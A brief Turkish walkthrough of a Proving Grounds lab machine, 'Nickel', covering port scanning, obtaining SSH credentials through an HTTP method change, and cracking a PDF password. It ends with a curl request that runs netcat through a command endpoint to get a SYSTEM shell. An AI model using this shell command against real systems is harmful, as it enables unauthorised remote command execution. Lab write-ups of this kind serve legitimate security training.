Proving Grounds Practice — Nickel — giselle
Proving Grounds Practice: Nickel

Merhaba, bugün Proving Grounds Practice’ten Nickel makinesinin çözümünü anlatacağım.
İlk olarak Nmap taraması başlatıyoruz.

80 portundaki web sitesini incelediğimizde şöyle bir ekranla karşılaşıyoruz:

33333 portundaki web sitesini incelediğimizde şöyle bir ekranla karşılaşıyoruz:

8089 portundaki web sitesini incelediğimizde şöyle bir ekranla karşılaşıyoruz:

Bu sayfanın kaynak kodunu incelediğimizde, farklı bir IP ile 33333 portuna giden dizinler dikkatimizi çekiyor. Bu sayfalara kendi IP adresimizle erişmeyi denedik. list-running-procs dizinine GET isteğiyle gidemediğimizi fark ettik.


Burp Suite ile metodu değiştirerek isteği tekrar gönderdiğimizde SSH giriş bilgilerini elde ettik. Parolayı base64 ile çözümleyerek öğrendik.



Ardından bu kullanıcı bilgileriyle FTP üzerinden bir PDF dosyası edindik. pdf2crack aracıyla PDF parolasını kırdık ve PDF belgesi içinde çeşitli bilgiler yer alıyordu.



80 portundaki command endpoint üzerinde whoami komutunu çalıştırdığımızda nt authority\system yetkisiyle çalıştığını fark ettik.

Netcat exe dosyasını SSH bağlantısı üzerinden gönderdik.

İki ayrı SSH bağlantısından birinde Netcat ile dinliyoruz. Diğerinde ise curl aracılığıyla 80 portundaki nc exe’yi çalıştırma komutunu gönderiyoruz.


1curl http://nickel/?cmd%20%2Fc%20C%3A%5CUsers%5Cariah%5Cnc.exe%20127.0.0.1%204444%20-e%20cmd.exeNT AUTHORITY\SYSTEM yetkisini elde ettik! proof.txt dosyamızı alabilir ve makineyi tamamlayabiliriz.
Bayrağı bulduk, challenge tamamlandı. Hacklemaya devam!
Pratik mükemmelleştirir. :)